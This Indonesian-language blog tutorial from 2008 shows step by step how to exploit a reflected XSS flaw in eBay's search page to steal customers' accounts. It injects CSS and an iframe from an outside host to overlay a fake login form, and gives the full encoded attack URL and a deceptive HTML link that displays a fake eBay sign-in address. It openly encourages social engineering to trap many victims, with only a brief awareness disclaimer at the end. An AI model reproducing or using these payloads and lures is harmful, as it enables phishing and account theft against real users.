<(o)-(Back)--<

 

WWW.SPYROZONE.NET

 

 
[245]. eBay XSS Vulnerability: Stealing Customer's Account

 

 

 

  

-----------------------------------------------------------------------------------

Author  : SPYRO KiD

Contact : admin@spyrozone.net => http://spyrozone.net

CopyLEFT (c) 2008 www.spyrozone.net All Rights Reserved

02/06/2008 23.40.41 WIB

-----------------------------------------------------------------------------------

 

 

  

Preface
...oO~0-(
Sekilas Tentang eBay )-0~Oo...

 
Yaa.. siapa sih yang nggak kenal dengan eBay. eBay (http://ebay.com) adalah sebuah situs web lelang online, di mana orang-orang dari seluruh dunia dapat membeli dan menjual berbagai barang dan jasa. --> saya contek mentah-mentah dari Wikipedia Indonesia http://id.wikipedia.org/wiki/EBay ^_^

 

 

Hmm.. tentu menyenangkan bukan kalau kita bisa mendapatkan account eBay orang lain ^_* Ada celah XSS pada situs eBay yang hingga artikel ini ditulis masih belum di FIX meskipun pihak terkait telah dihubungi. Di artikel ke 244 ini, saya akan memandu Anda mengexploitasi kelemahan itu untuk membuat sebuah halaman login palsu dengan beberapa trik:

  • Menyembunyikan pesan ERROR hasil Injeksi

  • Menyembunyikan Script XSS dari textbox tempat injeksi

  • Yaa... gitu dech, intinya menyembunyikan hal-hal yang nggak perlu dari halaman web hasil injeksi untuk meminimalisir kecurigaan korban ^_^

 

 
Pembahasan
...oO~0-( Langkah-Langkah Exploitasi )-0~Oo...

 
 


LANGKAH 1


eBay memiliki layanan pencarian baru pada http://shop.ebay.com/ Untuk menguji adanya celah XSS, saya memasukkan code JavaScript berikut pada form pencarian:

   

<script>alert('SPYRO KiD\nadmin@spyrozone.net\nhttp://spyrozone.net');</script>

       

Dan hasilnya begitu tombol [Search] ditekan, muncul sebuah Message Box peringatan yang menampilkan pesan saya ;D Uhm.. ini tandanya script yang saya injeksikan tadi dieksekusi dan serangan XSS berhasil ;)

 


 
 

LANGKAH 2


Hmm.. kini saya coba memasukkan tag HTML berikut ini pada field pencarian:

 

</a><center><hr>SPYRO KiD<hr>admin@spyrozone.net<br>http://spyrozone.net</b><hr>

 

Setelah tombol [Search] di klik.. ternyata kemudian tampil sebuah teks di tengah area result akibat dari tag <center> diikuti sebuah garis hasil dari tag <hr>, lalu dibawahnya ada Handle saya diikuti garis lagi dan selanjutnya seperti pada gambar dibawah ini (area No.4):



 

Tag </a> pada script yang saya inputkan saya berikan agar pada area result teks yang ingin saya tampilkan tidak didisplay sebagai link. Dan.. yeah, teks tampil sebagaimana saya inginkan. Wah, dari sini saya tau bahwasanya ternyata Attacker bisa menginputkan tag HTML sesuka hati ^_*

Coba Anda lirik kembali gambar diatas (dilirik aja yach, ga usah dipelototin ^_^). Point-point penting yang perlu diperhatikan telah saya lingkari:

o)-- Point (1)

Ini bisa jadi masalah. Andai kita mengirimkan URL serangan XSS pada user, maka user akan curiga karena pada form pencarian muncul script "aneh". User akan segera sadar bahwa halaman situs yang dikunjunginya merupakan halaman hasil "karya" attacker. Oleh karena itu, teks pada field pencarian tersebut harus dihilangkan, atau dibuat tidak tampak ;)

 

o)-- Point (2)

Wah, udah jelas tuch, ada Search Options. User bisa tidak focus pada halaman tipuan. Search Option pada area 2 juga harus dilenyapkan dari muka bumi ;D

 

o)-- Point (3)

Kata-kata janggal 0 item found for' tersebut juga jelas harus dihilangkan.

 

o)-- Point (4)

Ini area tempat informasi palsu nantinya ditempatkan ^_^


 
 

LANGKAH 3


Point 1 akan saya telusuri terlebihdahulu. Untuk itu, saya block area input field pencarian (gak keliatan yach blocknya.. x_x), klik kanan, lalu klik View Selection Source

 

 

Hmm.. terlihat bahwasanya input field pencariannya punya nama class srchfld

 

 

Catat hasil penemuan penting tersebut ;)

 

 

LANGKAH 4


Point 2 nggak usah diperhatikan, itu bisa kita hajar nanti. Sekarang langsung beralih menelusuri Point 3. Caranya sama, saya Block teks  "0 item found for'", klik kanan lalu pilih  View Selection Source untuk mengetahui tag HTML-nya.

 

 

Yupz.. dapet point penting lagi. Ternyata area result pencarian punya nama class fpc

 

 

Sampai disini cukup sudah informasi yang kita butuhkan. Saatnya membuat CSS yang nantinya akan diinjeksikan. Saya membuat file bernama css-ebay.css yang berisi script berikut:

 

.fpc {color:#FFFFFF}
.fpc h1 {color:#FFFFFF}
.srchfld {color: #FFFFFF}

 

Dengan demikian, bila css ini nantinya diinjeksikan, maka semua teks yang berada pada class fpc dan srchfld akan berwarna putih. Background halaman situs eBay khan berwarna putih, jika teksnya juga berwarna putih, maka area mencurigakan tadi nggak akan kelihatan ^_*


 

 

LANGKAH 5

 
Saya kemudian membuat sebuah halaman login palsu yang mirip dengan halaman login situs eBay. Saya beri nama ebay-login.php Selanjutnya tinggal melakukan upload file-file yang akan diinjeksikan, yaitu css-ebay.css dan ebay-login.php

File-file tersebut saya upload di http://black-it.net, tepatnya di lokasi:


http://black-it.net/xss/css-ebay.css
http://black-it.net/xss/ebay-login.php

 

Berikut ini adalah tampilan halaman login palsu tersebut (ebay-login.php):

 

 

Halaman login ini nantinya yang akan diinjeksikan pada situs eBay.
 
 

 

LANGKAH 6

 
Kembali lagi ke http://shop.ebay.com. Saya kemudian memasukkan script berikut ini pada input field pencarian:

 

<link rel="stylesheet" type="text/css" href="http://black-it.net/xss/css-ebay.css">

<center><br><iframe src="http://black-it.net/xss/ebay-login.php" width="350" height="312" scrolling="no" border="0" frameborder="0">

</iframe><noscript>

 

Perhatikan script diatas. Mula-mula saya memanggil css yang saya buat tadi, diikuti dengan bantuan tag <IFRAME> untuk memanggil form login palsu. <NOSCRIPT> pada akhir script diatas akan menghilangkan seluruh area dibawah area login palsu beserta area Search Options yang menjadi masalah di o)--point(3) tadi.

Setelah tombol [Search] di klik.. maka hasilnya..

 

 


Hmm.. kini salin dech URL halaman tersebut dari AddressBar:

 

http://shop.ebay.com/?_from=R40&_npmv=3&_trksid=m38&_nkw=%3Clink+rel%3D%22stylesheet%

22+type%3D%22text%2Fcss%22+href%3D%22http%3A%2F%2Fblack-it.net%2Fxss%2Fcss-ebay.css%22%3E%

3Ccenter%3E%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fblack-it.net%2Fxss%2Febay-login.php%

22+width%3D%22350%22+height%3D%22312%22++scrolling%3D%22no%22+border%3D%220%22+frameborder%

3D%220%22%3E%3C%2Fiframe%3E%3Cnoscript%3E&_sacat=See-All-Categories

 

Tinggal menyebarkan link diatas kepada User, tentunya dengan Social Engineering yang professional agar semakin meyakinkan dan bisa menjebak banyak korban. Tuliskan pesan pesan anda... entah menawarkan sesuatu atau apapun, intinya agar user melakukan klik URL yang Anda kirimkan... ;D Bisa juga dengan berpura-pura mengirimkan Confirmation Link, atau jika email Client yang digunakan support HTML bisa membuat link tipuan seperti ini:

 

<a href="

http://shop.ebay.com/?_from=R40&_npmv=3&_trksid=m38&_nkw=%3Clink+rel%3D%22stylesheet%

22+type%3D%22text%2Fcss%22+href%3D%22http%3A%2F%2Fblack-it.net%2Fxss%2Fcss-ebay.css%22%3E%

3Ccenter%3E%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fblack-it.net%2Fxss%2Febay-login.php%

22+width%3D%22350%22+height%3D%22312%22++scrolling%3D%22no%22+border%3D%220%22+frameborder%

3D%220%22%3E%3C%2Fiframe%3E%3Cnoscript%3E&_sacat=See-All-Categories" target="_blank">

http://signin.ebay.com/ws/eBayISAPI.dll?SigIn</a>

 

Nantinya si penerima akan melihat link tersebut sebagai:

 

http://signin.ebay.com/ws/eBayISAPI.dll?SigIn

 

Namun begitu di klik, korban akan segera dikirim ke halaman login tipuan tadi ;)

 
 


Penutup
...oO~0-( - - - - - - - - )-0~Oo...

 
That's all ^_* Ini hanya merupakan salah satu contoh bahaya dari serangan XSS yang mungkin timbul. Pemanfaatan lain dari celah ini bisa beraneka ragam, misalnya saja mencuri cookies user, menyisipkan malware, dan lain sebagainya. Semoga bermanfaat dan semakin menambah kewaspadaan kita ;D

  

 

 

o)---( Referensi )

  • http://id.wikipedia.org/wiki/EBay

  • http://google.com/search?q=xss

  • http://spyrozone.net - [237]. Having Fun With Cross Site Scripting (XSS) + POC Pencurian Password


 

/* ------------------------------|EOF|------------------------------ */

 

  <(o)-(Back)--<   

 WWW.SPYROZONE.NET